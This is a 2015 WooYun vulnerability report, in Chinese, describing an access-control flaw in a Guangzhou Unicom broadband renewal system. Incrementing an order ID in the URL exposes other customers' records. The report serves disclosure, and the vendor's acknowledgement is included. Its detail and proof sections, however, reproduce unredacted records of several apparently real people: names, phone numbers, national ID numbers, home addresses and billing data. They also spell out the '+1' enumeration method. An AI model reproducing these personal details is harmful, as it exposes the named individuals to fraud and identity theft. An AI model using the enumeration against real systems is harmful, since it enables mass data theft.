当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0156222

漏洞标题:广州联通某安全漏洞导致上万用户信息泄漏(宽带安装地址+身份证+姓名+电话+产品号码)

相关厂商:广州联通

漏洞作者: 0x 80

提交时间:2015-11-27 12:26

修复时间:2016-01-15 17:32

公开时间:2016-01-15 17:32

漏洞类型:敏感信息泄露

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-11-27: 细节已通知厂商并且等待厂商处理中
2015-12-01: 厂商已经确认,细节仅向厂商公开
2015-12-11: 细节向核心白帽子及相关领域专家公开
2015-12-21: 细节向普通白帽子公开
2015-12-31: 细节向实习白帽子公开
2016-01-15: 细节向公众公开

简要描述:

广州联通某安全漏洞导致上万用户信息泄漏(宽带安装地址+身份证+姓名+电话+产品号码)
PS:公民的隐私啊~~~~

详细说明:

漏洞在这
http://**.**.**.**/gzwl/visit/renewBusinessOrder/renewBusinessOrderExecute.action?id=49733606

91.jpg


ID没有加密
替换即可查询上万用户

用户姓名: 	潘柏泉 	联系电话: 	15622192358 	接入间: 	广州海珠广骏二手车城(EPON)
代理商编码: 81EB1 代理商名称: 广州热线来话营销渠道(广州诚伯) 客户名称: 潘柏泉
产品名称: 沃宽带_虚拟拔号接入(预付) 产品号码: 70000135 联系人: 潘柏泉
安装地址: (海珠大塘东华南一巷 )广州市海珠区新滘中路广骏二手车城A7-1 主号码: 02000595470 到期时间: 2015-07-07
套餐名称信息: 优惠活动信息: 1年-780元(660宽带+120增值)
证件类型: 身份证(驾驶证) 证件号码: 440106198204281513 主体服务状态: 宽带迁转销户


工单编号: 	49733606 	工单名称: 	潘柏泉的续费业务工单
创建人: 邱怀德 状态: 转派客服
生成时间: 2015-06-26 17:10 要求结束时间: 2015-07-03 17:10
客户要求续费套餐: 续费模式: 营业厅(3G体验营业厅) (融合)
续费备注: 智慧沃家组合套餐,有4G号码18613188822(宽带侧10M60元/月);用户联系电话:18613188822
联系结果: 成功联系 已续费融合(备注融合移动侧号码) 已续费裸宽 联电关机 联电忙音 联电无人听 联电转秘书台 联电提示无法接通 拒绝回访(备注) 无效联电(备注)


http://**.**.**.**/gzwl/visit/renewBusinessOrder/renewBusinessOrderExecute.action?id=49733608

92.jpg


用户姓名: 	李忠意 	联系电话: 	13108507268 	接入间: 	广州海珠玫瑰园
代理商编码: 81EB1 代理商名称: 广州热线来话营销渠道(广州诚伯) 客户名称: 李忠意
产品名称: 沃宽带_虚拟拔号接入(预付) 产品号码: 70000135 联系人: 李忠意
安装地址: (海珠区圣堂大街)广州市海珠区昌岗中路西市大街2巷10号401 主号码: 02000544332 到期时间: 2015-07-05
套餐名称信息: 预付-6M-每月73.33元(73.33元宽带) 优惠活动信息: 广州-预付-6M宽带-1年-880元(每月73.3元)-201405
证件类型: 身份证(驾驶证) 证件号码: 430426198712186619 主体服务状态: 欠费销号


工单编号: 	49733608 	工单名称: 	李忠意的续费业务工单
创建人: 李伟陶 状态: 转派客服
生成时间: 2015-06-26 17:29 要求结束时间: 2015-07-03 17:29
客户要求续费套餐: 续费模式: 营业厅(信和营业厅厅) (融合)
续费备注: 智慧沃家共享套餐,新开4G号码(4G侧49.9元/月+宽带侧10M60元/月)
联系结果: 成功联系 已续费融合(备注融合移动侧号码) 已续费裸宽 联电关机 联电忙音 联电无人听 联电转秘书台 联电提示无法接通 拒绝回访(备注) 无效联电(备注)
备注: 用户表示最近都比较忙,有空会到我厅办理续费。


越权访问
http://**.**.**.**/gzwl/visit/renewBusinessOrder/renewBusinessOrderDetail.action?id=49733605

客户信息 关闭
用户姓名: 罗萍 联系电话: 13622837605 接入间: 广州番禺大罗二
代理商编码: 81EB1 代理商名称: 广州热线来话营销渠道(广州诚伯) 客户名称: 冯鹏程
产品名称: 沃宽带_虚拟拔号接入(预付) 产品号码: 70000135 联系人: 冯鹏程
安装地址: (大罗机房)番禺区沙头街大罗塘云光首饰宿舍401 主号码: 02000439096 到期时间: 2016-07-20
套餐名称信息: 预付-6M-附属增值-每月65元(55元宽带+10元增值包) 优惠活动信息: 1年-780元(660宽带+120增值)
证件类型: 身份证(驾驶证) 证件号码: 620523198511213491 主体服务状态: 开通
缴费明细 关闭
活动 规则属性 转兑包状态 转兑包金额 创建时间 失效账期
XDSL-4M-附属增值-1年-880元(760宽带+120增值) 本金 正常 760 2012-07-20 202111
XDSL-4M-附属增值-1年-880元(760宽带+120增值) 本金 正常 120 2012-07-20 202111
6M-附属增值-1年-780元(660宽带+120增值) 本金 正常 660 2013-07-22 202211
6M-附属增值-1年-780元(660宽带+120增值) 本金 正常 120 2013-07-22 202211
1年-780元(660宽带+120增值) 本金 正常 660 2014-07-21 202311
1年-780元(660宽带+120增值) 本金 正常 120 2014-07-21 202311
1年-780元(660宽带+120增值) 本金 正常 660 2015-07-21 202411
1年-780元(660宽带+120增值) 本金 正常 120 2015-07-21 202411
工单信息 关闭
工单编号: 49733605 工单名称: 罗萍的续费业务工单
创建人: 邱志鸿 状态: 转派客服
生成时间: 2015-06-26 17:08 要求结束时间: 2015-07-03 17:08
客户要求续费套餐: 续费模式: 营业厅(清河营业厅) (融合)
续费备注: 智慧沃家共享套餐,新开4G号码(4G侧49.9元/月+宽带侧10M60元/月)
客户已交金额: 客户所选套餐:
续费期限:
处理人: 关杏生 处理时间: 2015-06-27 10:09
续费情况跟进结果:
联系结果 : 成功联系
续费意向 : 同意续费
续费原因 : 融合套餐
备注:


http://**.**.**.**/gzwl/visit/renewBusinessOrder/renewBusinessOrderDetail.action?id=49733609


客户信息 关闭
用户姓名: 许娟 联系电话: 13924023684 接入间: 广州番禺祈福新村海晴居
代理商编码: E257D 代理商名称: 广东星玮电讯有限公司 客户名称: 许娟
产品名称: 沃宽带_虚拟拔号接入(预付) 产品号码: 70000135 联系人: 许娟
安装地址: (GZPY718)广州市番禺区祈福新村海晴居6街32A-6F 主号码: 02000451223 到期时间: 2015-07-25
套餐名称信息: 预付-10M-每月90元(90元宽带) 优惠活动信息: 1年-1080元
证件类型: 身份证(驾驶证) 证件号码: 340204198010010749 主体服务状态: 欠费停机
缴费明细 关闭
活动 规则属性 转兑包状态 转兑包金额 创建时间 失效账期
割接专用虚拟活动 赠款 正常 0.01 2012-05-28 202003
割接专用虚拟活动 本金 正常 0.01 2012-05-28 202003
XDSL-4M-半年-588元 本金 正常 588 2013-04-08 202202
XDSL-4M-半年-588元 本金 正常 588 2013-10-09 202208
XDSL-4M-半年-588元 本金 正常 588 2012-10-08 202108
1年-1080元 本金 正常 1080 2014-06-22 202310
工单信息 关闭
工单编号: 49733609 工单名称: 许娟的续费业务工单
创建人: 黄健虹 状态: BSS未交费
生成时间: 2015-06-26 17:35 要求结束时间: 2015-07-03 17:35
客户要求续费套餐: 续费模式: 代理商 (融合)
是否上门收费: 否
续费备注: 智慧沃家共享套餐,新开4G号码(4G侧49.9元/月+宽带侧10M60元/月)客户联电是13924023684
客户已交金额: 客户所选套餐:
续费期限:
处理人: 徐淑萍 处理时间: 2015-07-23 17:51
续费情况跟进结果:
联系结果 : 联电提示无法接通
续费意向 :
续费原因 :
备注:


漏洞证明:

http://**.**.**.**/gzwl/visit/renewBusinessOrder/renewBusinessOrderDetail.action?id=49733609


http://**.**.**.**/gzwl/visit/renewBusinessOrder/renewBusinessOrderDetail.action?id=49733610
http://**.**.**.**/gzwl/visit/renewBusinessOrder/renewBusinessOrderDetail.action?id=49733611
http://**.**.**.**/gzwl/visit/renewBusinessOrder/renewBusinessOrderDetail.action?id=49733612
http://**.**.**.**/gzwl/visit/renewBusinessOrder/renewBusinessOrderDetail.action?id=49733613
依次+1逻辑,查询上万用户

修复方案:

过滤

版权声明:转载请注明来源 0x 80@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:14

确认时间:2015-12-01 17:32

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT下发给广东分中心,由其后续协调网站管理单位处置.

最新状态:

暂无


漏洞评价:

评价

  1. 2015-11-27 14:35 | 正义的伙伴 ( 普通白帽子 | Rank:131 漏洞数:28 | 正义!!)

    公民还有隐私么。。。。